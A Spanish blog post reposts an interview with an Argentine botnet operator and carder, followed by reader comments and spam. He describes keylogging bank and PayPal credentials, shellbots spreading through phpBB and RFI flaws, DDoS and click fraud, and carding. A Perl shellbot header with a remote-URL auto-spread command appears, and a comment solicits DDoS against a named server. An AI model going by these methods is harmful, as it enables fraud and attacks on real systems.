Saludos nuevamente aqui tratando de rescatar la información en la red.
Parece que están ocurriendo mas cosas extrañas en la red.
Hay un tread en un foro no muy conocido donde salía una comprometedora
entrevista a Morgan! Doseador y Carder Argentino.
Bien el link es este:
http://www.securityadiction.com/index.php?name=News&file=article&sid=24
Pero a desaparecido la información ahora sale el mensaje
Lo sentimos pero no tienes autorización para leer esta noticia
completa
No sabemos si es cosa de morgan o quisa cosa de los dueños del foro
para obligar a registrarce o protegerce de atackes por culpa de ese articulo,
quien podría hacer los ataques, alguien se imagina quien puede querer evitar
que aparezca esta info, en fin no se la razon asi que pondre una copia de
dichoso articulo.
Presten atención a la entrevista de este capuyo como se ensucia con sus
propios argumentos:
Virus: Entrevista: Botnets... el lado oscuro
Botnets, redes Zombie, shellbots, winbots… quien no ha oído hablar de alguno
de esos términos, muchos se preguntaran ¿quien los hace? ¿Por qué lo hacen?
¿Qué significa?, hoy gracias a una entrevista a fondo y en exclusiva a un
conocido manipulador, programador, creador de inteligencia artificial (bots)
podemos responder y aclarar el panorama acerca de este tema.
La siguiente entrevista se realizo con Morgan joven argentino que con
solo unos años de edad ya es conocido personaje del ámbito under no solo en
Argentina sino también en muchos países internacionales, incluso mas de una
vez ha aparecido en listas de virus, seguridad, y por que no también decirlo en
foros y otros lugares donde gente sin experiencia busca información acerca de
este tema.
Morgan, ¿criminal?, ¿hacker?, ¿un dios?, en esta
entrevista se hablo de muchas temáticas, incluyendo respuestas fuera de lo común,
lo que nadie se atrevió a dar a conocer, la explicación que muchos buscan, el
inicio de la información…
Damos gracias a el por habernos brindado esta entrevista, léanla atentamente ya
que hay muchas cosas que deberían saber y nosotros gracias a el las hacemos
publicas.
SA: Antes que nada, hace cuanto tiempo llevas metido en el tema de botnets y
como se te ocurrió empezar en esto?
Morgan: Me interesó el tema en el año 2002/2003 no recuerdo bien. Un amigo,
quien ya tenia su primer Bot formaba parte de un grupo que Hacían un bot
llamado Prototype (pTy)
Me había mostrado un par de veces Sus canales con Botnets ...y las cosas que
podía hacer, entonces decidí averiguar un poco del tema.
SA: Tenemos entendido que la gran mayoría de personas que tienen botnets lo
usan
para ataques de denegación de servicio, que otra utilidad les dan además de
eso?
Morgan: La denegación de servicio fue un furor estos años para mucha gente, yo
al principio los utilizaba para sacar claves... dejaba la función KeyLog de el
bot encendida hacia algún canal ejemplo #Info y con algún script de mIRC
grababa todo lo que había en #Info
(on *:text:*:#info:write c:/info.txt $1-)
Al día siguiente me pasaba un buen rato viendo que había capturado el KeyLog
...
Encontraba cuentas bancarias, paypals, servidores roots, Ftp’s, correos,
sitios del gob. Luego de eso comencé a usarlos para la denegación de servicio
Me parecía divertido, todos temían de que yo les agarre la IP jaja…
en los servidores IRC tenia lo que quería con solo pedirlo (ips de usuarios, O:
lines etc.), la utilidad que prefiero darles ahora es Crear algunos programas
por ejemplo para Hacer falsos clicks en AdSense o Testear otras cosas... la
verdad ahora no uso (winbots) para atacar. Solo los uso para sacar información
como hacia antes
SA: Winbots, hemos visto muchos códigos hablemos de shellbots (exp) es mas
poderosa una botnet con shellbots que una con winbots?
Morgan: Los shellbots los conocí creo en el año 2004 o 2005. Antes era un
simple script en perl que dejaba controlar la shell desde el IRC, con la opción
de hacer un UdpFLood, Tcpflood.
En el 2005 con el error de PhpBB (viewtopic.php?t=) Era una locura que tantos
sitios estén vulnerables a alguien se le ocurrió la idea de editar ese
Shellbot para que Busque en google los foros PhpBB y los infecte automáticamente
Y decidimos Hacerlo… Me acuerdo muy bien esa noche cuando se probaba el código.
Cuando comenzó a funcionar, nosotros teníamos un par de IRcd linkeados que
soportábamos 3072 usuarios (nunca pensábamos en llenarlo) fue una cosa de
locos, Lanzar el bot a buscar y ver como llovían... pero miles de Shellbots.
Era una cosa impresionante que hasta el día de hoy en los Winbots yo nunca he
Visto En cuestión de un par de minutos, ya se habían llenado los 3 servidores.
(3050 servidores WEB. los que equivalían a miles pero miles de maquinas de
Windows "normales" infectadas) Me acuerdo que alguien que estaba con
migo y otra gente en el Canal de pruebas Se fue porque tenia miedo de tener algún
problema. Jaja…
La cosa es que ese código se hizo muy conocido y luego Google cambio el método
de la búsqueda y el método de mostrar los resultados Ese shellbot todavía
sigue por ahí en Internet, creo que había 40.000 sitios vulnerables.
Luego que paso todo eso, en el 2006 yo decido arreglar la Versión de ese Bot
pero con otras funciones.
Por ejemplo este bot Buscaba lo que querías en google no solamente como antes
(phpbb) sino que ahora podías aprovechar cualquier tipo de vulnerabilidad RFI
Para tener tu Botnet. Yo estaba en la red Gigachat donde toda la gente utilizaba
mi código para infectar sitios y defacearlos o que se yo.
Cuando publique El código, que todavía lo tengo guardado:
#!/usr/bin/perl
# VulnScan v6 Stable By Morgan
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
# www.priv8.com.ar
#
# [Morgan]: http://priv8.com.ar/Zerocool.jpg
# [Morgan]: u got owned
# [ZEROCOOL]: bro
# [ZEROCOOL]: it's a rbot
# [ZEROCOOL]: i'm not fuckingstupid
# [ZEROCOOL]: uahuahuahuahua
#
#
# Greets to irc.gigachat.net :: #Morgan
#
#
# To work with auto-spread :
# Create a file named spread.txt with this :
#
#
#
# Change the url .. put ur bot url in that file
# then use the command :
#
# !morgan !eval @cmdstring='http://yoursite.com/spread.txt';
# or directly change it from the code..
#
# Enjoy the bot ....
# /Morgan
Bueno en fin. hoy en día los shellbots los usan casi todos, ya no prefieren
usar winbots ya que rinden mucho menos ahora los utilizan para Buscar en google
sitios vulnerables y defacearlos (A mi
criterio una estupidez)
Y claro el típico ddos... que ahora cualquiera se la da de Haxor con un par de
bots :o)
SA: Si bien cada bot tiene cierta cantidad de fallos por los cuales escanear
explotan y se reproducen (se denominan spreaders) es posible
darles comandos como por ejemplo: update?
Morgan: Si, yo tengo una versión con el comando !Update que lo que hacia era
bajar el nuevo bot de alguna URL matar el proceso del bot actual y ejecutar el
nuevo (Muy similar a los winbots)
SA: Los códigos llamados 0day o bots nuevos que no son públicos, generalmente
se
venden o intercambian, ahora en el caso de querer comprarlos se puede comprar
con datos de alguna cuenta paypal o tarjeta de crédito digamos hacer una
transferencia a esta X persona que tiene el código o generalmente es de otra
forma?
Morgan: Yo nunca he vendido/comprado 0day's siempre los regalo (que buena
persona)
Pero alguna que otra vez he recibido un buen $$ por dar algunos 0day
SA: El tema de irc donde se alojan los bots... hay gente de empresas que
realmente sepan que tienen alojado este tipo de irc y por temor o X motivo hacen
"la vista a un lado"?
Morgan: Yo conozco empresas que el mismo dueño aloja botnets en ella, pero no
deja que
sus clientes lo hagan. El problema de eso es cuando alguna Web de antivirus o lo
que sea Desencriptan tu bot y denuncian la IP del botnet.
SA: A tu criterio que tan vulnerable son los sistemas Windows? en el caso de las
botnets que sistema es mas propicio a infectar Windows o Linux?
Morgan: Prefiero infectar servidores en Linux, en Windows es como que ya me
aburro no le
veo la gracia, salvo que encuentre alguna cosa nueva para hacer Son muchísimos
mas vulnerables los sistemas en Windows.
SA: Los bots poseen algún tipo de identificación que te permita saber de que
país provienen?
Morgan: Hay versiones de Winbots y Shellbots que detectan el país, lenguaje o
sistema
donde están ejecutados y hasta tienen de nick el país...
Por ejemplo:
[05|USA|XP|SP0]-7271
EL 05 es la cantidad de días, USA es su país, XP el sistema operativo y SP0 en
esa versión indica que service pack lleva
En shellbots:
[BR]-91827374
[USA]-12938582
[UK]-19237214
País - números y letras aleatorias.
SA: Podes comentarnos algunas funciones de ellos?
Morgan: Acá tenes algunas, http://www.darksun.ws/phatrxbot/rxbot.html :)
Y en los Shellbot... los mas usados son el !scan , !udpflood !tcpflood !synflood
!httpflood y !portscan
SA: En tu caso principalmente que objetivo buscas al tener una botnet? ego
propio, ataques de denegación, obtener datos...
Morgan: Yo los tengo porque son de utilidad muchas veces, ya sea para hacer algún
pequeño ddos, sacar alguna info, entrar en algún servidor
SA: Denegación de servicio... alguna empresa te ha pagado alguna vez por este
servicio?
Morgan (nos cita un documento en la Web que habla de el): En 9 días hemos
recibido 6 ataques masivos a nuestro sitio Web, motivo
por el cual de manera constante nos han tirado abajo los servidores.
Algunos de los servers: que el joven: "MORGAN", se ha encargado de
ATACAR
FEROZMENTE, son:
1) http://www.freesevers.com
2) http://www.fortunecity.com
3) http://www.adwarspace.com
4) http://www.110mb.com
5) http://www.googlepages.com
También los servidores de nuestro Foro de Discusión están recibiendo ataques
Masivos, y en estos momentos se está trabajando para ponerlo nuevamente ON LINE.
Por esta TAN NOBLE TAREA, "Morgan" (que algún día les contaré quien
es, a que se
dedica, y muchas otras cosas mas) cobra la nada despreciable suma de $ 3.000
mensuales, desde el mes de mayo de este año.
SA: Cuanto tardaría una persona en obtener digamos un par de cientos de bots a
partir de uno solo?
Morgan: Depende... una persona con recursos y conocimientos... minutos, una
persona que ha creado su primer botnet y es su primera experiencia y no tiene
recursos puede tardar un poco
SA: La pregunta del millón: ¿es verdad que obtenes acceso a cuentas de banco
papals
datos de tarjeta de crédito y parecidos con ellos? y luego... es posible
"retirar dinero" de esas cuentas para beneficio propio?
Morgan: O.o
Yo Prefiero vender los datos antes que arriesgarme como antes.
Claro que es posible, en algunas épocas se pone de moda algún llamado BUG en
Western unión con el tema de las transferencias actualmente esta funcionando
con Italia y Francia, hasta hace poco con Australia.
Después están los Cashiers, que son los que les pasas las cuentas o les haces
las transferencias bancarias y ganas tu %.
Igualmente esta muy vulnerable la seguridad con el tema de compras online
(Porque a las empresas les conviene) Así que no es tan difícil ir a Amazon.com
comprarse algo con tarjeta, y crear una Suite en Skybox para recibir las cosas.
SA: Hemos tenido contacto con varias personas que mantienen botnets e incluso
nos han invitado a su irc para ver funcionar sus bot, hemos visto algo que nos
llamo la atención una especie de "mercado negro", la compra o venta
de cuentas paypal e-gold datos de tarjetas de crédito etc... sin compromisos,
podes explicar de que se trata?
Morgan: Claro, es la típica venta de garaje... se vende de todo... yo en eso
que le llamas "mercado negro" he visto desde venta de tarjetas hasta
trafico de
personas.
SA: Se puede ganar dinero no solo con ataques sino por ejemplo: generando mas
visitas en una Web realizando clicks en sistema que pagan por ello, etc.?
Morgan:
Ingresos de hoy: US$218,25
Responde eso tu pregunta? ^^
SA: Que tan seguros son los bots? es decir sabemos que alguien con pocos
conocimientos puede "robarte" una botnet lo cual podría ser un gran
desastre
como se protegen ante este tipo de ataques?
Morgan: Uff no me hagas acordar, si abre perdido bots en el camino
Lo mejor es asegurarse de usar un servidor propio, con las contraseñas del ircd
Encriptadas... y utilizar autentificacion por nick!ident@host en los bots.
SA: En argentina que tan conocido es el tema? hay mucha gente metido en esto? y
realmente acá has hecho $$ a partir de algún "servicio de denegación"
Morgan: En argentina están de moda los winbots. También hay otros que tienen
sus shellbots, pero solo porque tienen el código que los genera y listo. (Así
cualquiera)
Yo sí, sinceramente he echo bastante dinero con el ddos y con los botnets. pero
hay otras cosas para sacar más dinero.
SA: Tuviste problemas con la "ley?
Morgan: Siempre "safé”, alguna vez tuve que parar. cambiar el disco. dns.
emails etc.
SA: Cual fue a tu criterio el mejor ataque que cometiste?
Morgan: Fibertel argentina (Owned =) en la época Del Santy shellbot. con
miles...
SA: Una vez cierta persona dijo en una entrevista (conocido portal hacker solo
por el nombre) :Yo no tengo ninguna botnet. Esos son criminales. ¿Que pensas?
realmente son criminales ustedes o es mas fácil juzgar a quien los
contrata a ustedes para este tipo de ataques?
Morgan:
Criminales? no creo.
Criminales son esos hijos de puta que roban, secuestran, matan gente en
nuestro país...
Criminales son esos políticos que nos gobiernan
SA: Palabras finales...
Hm, quisiera aclarar que hoy en día no realizo NINGUNA de las actividades
estas,
Be safe.
/Morgan
#EOF
En el transcurso de los días crearemos un video documental donde veremos la
“acción” por dentro de estos bots, como infectan realmente, donde
buscarlos, el mercado negro, y mas para que ustedes puedan observar mas
detenidamente este movimiento Ander que no tan conocido se lleva mucha ventaja
de otros…
Nota: Security Adiction = SA
PD: El pez por la boca muere!
6 comentarios:
http://gallir.blogspot.com
No esta mas galliii
FraniX:
jajaja, la ultima, Marcel ahora saco www.soporteserver.com, quiere robar clientes de otras empresas atacando servidores y extorcionando a los clientes con ataques para que alojen en su servicio y le compren alojamiento.
Marcel vi que me agregaste con una cuenta de ese dominio a mis direcciones de msn, se q me vas a leer, te pido que no apuntes hacia ami, ni me dirijas la palabra porque somos enemigos, solo te interesa lucrar, asi que relacionate con gente mugre de tu especie y ya no la quieras romper conmigo agregandome con otras direcciones. espero que tengas suerte y estes en la razon de no terminar con un tiro en la cabeza o podrido en una celda fria.
Te repito, no me vuelvas a agregar haciendote pasar por otro porque sino voy a pubilcar en todo internet el link de este blog y explicando la nueva estrategia de robo que estas haciendo con esa web www.soporteserver.com, podrite en el jugo de tu propia mierda y hace la tuya.
Se ve que desde pendejo fuiste a un colegio de chorros de los que en buenos aires hay muchos, porque eso es lo unico que sabes hacer...
os copiare un cachito de log por el propio f3nix cabreado,porke le habian sajoneado en un chat de irc.
el chat irc es irc.spainchat.net donde llevan sufriendo cerca de 3 años atakes tras atakes,osea imaginen como tienen ke estar del cada vez ke entre el f3nix.
(15:15) Emilio - www.dat: hola alguien x ahi
(15:16) `·.¸¸.·´´¯`··._.: si dime
(15:16) Emilio - www.dat: http://64.32.28.233/
(15:16) Emilio - www.dat: te abre esa web ?
(15:16) `·.¸¸.·´´¯`··._.: eso ke es
(15:17) Emilio - www.dat: la ip de spainchat
(15:17) `·.¸¸.·´´¯`··._.: y si me abre
(15:17) `·.¸¸.·´´¯`··._.: klaro ke abre
(15:19) Emilio - www.dat: tu estas en el cyber de spainchat no ?
(15:19) Emilio - www.dat: server digo
(15:19) Emilio - www.dat: je
(15:22) `·.¸¸.·´´¯`··._.: si
(15:22) `·.¸¸.·´´¯`··._.: klaro
(15:22) `·.¸¸.·´´¯`··._.: siempre estoy
(15:23) Emilio - www.dat: bueno el q me sajoin en varios seguido al gline
(15:23) Emilio - www.dat: esa red va morir
(15:23) Emilio - www.dat: esta semana me encargo
(15:23) Emilio - www.dat: ahora seguro al ssh
(15:23) Emilio - www.dat: no pueden entrar
(15:23) `·.¸¸.·´´¯`··._.: a ver kien te sajoneo
(15:23) Emilio - www.dat: pero creen q son vivos
(15:24) Emilio - www.dat: ahi sabran van a quedar sin red
(15:24) `·.¸¸.·´´¯`··._.: a ver
(15:24) `·.¸¸.·´´¯`··._.: abla klaro
(15:24) `·.¸¸.·´´¯`··._.: kien te sajoneo
(15:25) Emilio - www.dat: no se porq floodea
(15:25) `·.¸¸.·´´¯`··._.: no sabe kien te lo ase
(15:25) `·.¸¸.·´´¯`··._.: aaa
(15:25) `·.¸¸.·´´¯`··._.: es ke tu siempre
(15:25) `·.¸¸.·´´¯`··._.: tubiste mania
(15:25) `·.¸¸.·´´¯`··._.: a esa red
(15:25) `·.¸¸.·´´¯`··._.: te agan o no te agan na
(15:26) `·.¸¸.·´´¯`··._.: yo kreo ke aki atakan a otra red
(15:26) `·.¸¸.·´´¯`··._.: y siempre abra un gato negro
(15:26) `·.¸¸.·´´¯`··._.: y klaro el gato se llama spainchat
(15:35) Emilio - www.dat: si molestan a alguien se tienen q atener a las consecuencias
(15:36) `·.¸¸.·´´¯`··._.: kien te molesto
(15:36) `·.¸¸.·´´¯`··._.: pregunto
(15:36) Emilio - www.dat: fijate en opers
(15:36) Emilio - www.dat: debug
(15:36) `·.¸¸.·´´¯`··._.: a los sajoin
(15:36) `·.¸¸.·´´¯`··._.: koño y los atakes
(15:36) `·.¸¸.·´´¯`··._.: de ayer
(15:37) `·.¸¸.·´´¯`··._.: eso ponen nombre de FEN|NX
(15:37) `·.¸¸.·´´¯`··._.: y si sabes ke en esa red no te kieren
(15:37) `·.¸¸.·´´¯`··._.: pues no entre
(15:37) `·.¸¸.·´´¯`··._.: y yasta
(15:37) `·.¸¸.·´´¯`··._.: asi no pasara nada
(15:38) `·.¸¸.·´´¯`··._.: a mi me pusieron gline
(15:38) `·.¸¸.·´´¯`··._.: en una red
(15:38) `·.¸¸.·´´¯`··._.: solo por entrar a jugar
(15:38) `·.¸¸.·´´¯`··._.: a pink
(15:38) `·.¸¸.·´´¯`··._.: y mira
(15:39) `·.¸¸.·´´¯`··._.: no entro mas
(15:39) `·.¸¸.·´´¯`··._.: porke abra red
(15:39) `·.¸¸.·´´¯`··._.: para jugar
(15:39) Emilio - www.dat: si pero con el gline sufi
(15:40) Emilio - www.dat: ya q jodan con el sajoin
(15:40) `·.¸¸.·´´¯`··._.: a ver fenix
(15:40) `·.¸¸.·´´¯`··._.: no sea mas duro
(15:40) `·.¸¸.·´´¯`··._.: joder
(15:40) `·.¸¸.·´´¯`··._.: si tu cada vez ke as entrado
(15:40) `·.¸¸.·´´¯`··._.: es para joder
(15:40) `·.¸¸.·´´¯`··._.: o es mentira
(15:41) Emilio - www.dat: la ultima ves q entre era para buscarte
(15:41) `·.¸¸.·´´¯`··._.: a mi
(15:41) `·.¸¸.·´´¯`··._.: para ke
(15:41) `·.¸¸.·´´¯`··._.: si sabes ke estoy en msn
(15:41) Emilio - www.dat: si
(15:41) Emilio - www.dat: peroya hace mucho
(15:41) `·.¸¸.·´´¯`··._.: pues me buskas aki
(15:41) `·.¸¸.·´´¯`··._.: tio
(15:41) Emilio - www.dat: pero antes not e tneia
(15:41) Emilio - www.dat: porq
(15:41) Emilio - www.dat: se me borro el listado
(15:42) `·.¸¸.·´´¯`··._.: fenix ke jodido eres
(15:42) Emilio - www.dat: con el gline
(15:42) Emilio - www.dat: era sufi
(15:42) `·.¸¸.·´´¯`··._.: y jode kon el gline
(15:42) `·.¸¸.·´´¯`··._.: madre mia
(15:42) `·.¸¸.·´´¯`··._.: ke duro eres tio
(15:43) Emilio - www.dat: nanana te digo
(15:43) Emilio - www.dat: q con un gline todo bien
(15:43) Emilio - www.dat: el tema es el sajoin
(15:44) `·.¸¸.·´´¯`··._.: fenix yo no me expliko una kosa
(15:44) `·.¸¸.·´´¯`··._.: la mania ke le tienen a esa red
(15:44) `·.¸¸.·´´¯`··._.: te lo juro
(15:44) `·.¸¸.·´´¯`··._.: jamas me lo explikare
(15:44) Emilio - www.dat: no tengo mania si lo tuviera hace rato q no exitia
(15:45) `·.¸¸.·´´¯`··._.: kuando te pika el moskito
(15:45) `·.¸¸.·´´¯`··._.: la atakas
(15:47) Emilio - www.dat: ya paso un año q no le echo nada
(15:47) Emilio - www.dat: y aun sigen con su tontera
(15:48) `·.¸¸.·´´¯`··._.: a ver fenix
(15:48) `·.¸¸.·´´¯`··._.: nosotros si atakan o no
(15:48) `·.¸¸.·´´¯`··._.: nadie dice ke eres tu
(15:48) `·.¸¸.·´´¯`··._.: sin embargo
(15:48) `·.¸¸.·´´¯`··._.: ay chismes
(15:48) `·.¸¸.·´´¯`··._.: ke van y te dicen ke te kulpamos
(15:48) `·.¸¸.·´´¯`··._.: kuando eso es mentira
(15:48) `·.¸¸.·´´¯`··._.: ademas tus atakes
(15:48) `·.¸¸.·´´¯`··._.: los konocemos
(15:49) Emilio - www.dat: na si el otro dia con darkangelita taba q le enseñaba y esa shell se jodia con 4 bots
(15:50) Emilio - www.dat: lo cual creo q cualquiera la puede tirar
(15:50) Emilio - www.dat: de todas maneras regalo de navidad
(15:50) `·.¸¸.·´´¯`··._.: no kreo ke sin motivo se tire una red
(15:50) `·.¸¸.·´´¯`··._.: alla tu
(15:51) Emilio - www.dat: motivo sajoin masivo
(15:51) `·.¸¸.·´´¯`··._.: muy bien fenix
(15:57) `·.¸¸.·´´¯`··._.: solo te pido ke kuando agas el regalo por lo menos
havises.
Bueno pues imaginense ustd. cada vez ke kiere el señor la tira como se sentirian bastanta mal verdad .
espero y seguire diciendo ke hasta ke no vea a f3nix en la carcel no parare llevare esto mui lejos.
Respetos Morgan ;) y el ke DDose esta red digame como poruq e llevoo time y aun no cae ircchat.terra.cl:7000
Respeto a todos y saludos =o)
автомобильная сигнализация [url=http://thisnews.ru/]thisnews[/url] лыжные гонки
звезда нашей эстрады,отдающий предпочтение земляничному варенью и угрю во всех его проявлениях [url=http://aloudthink.ru/]aloudthink[/url] рикта
гомельоблместпром [url=http://xchild.ru/otrimannya-razom-z-vikladachami/]xchild[/url] тройская унция
Сравнительный тест зимних шин [url=http://mydepression.info/igra-to-ili-eto/]mydepression.info[/url] mitac mio
Publicar un comentario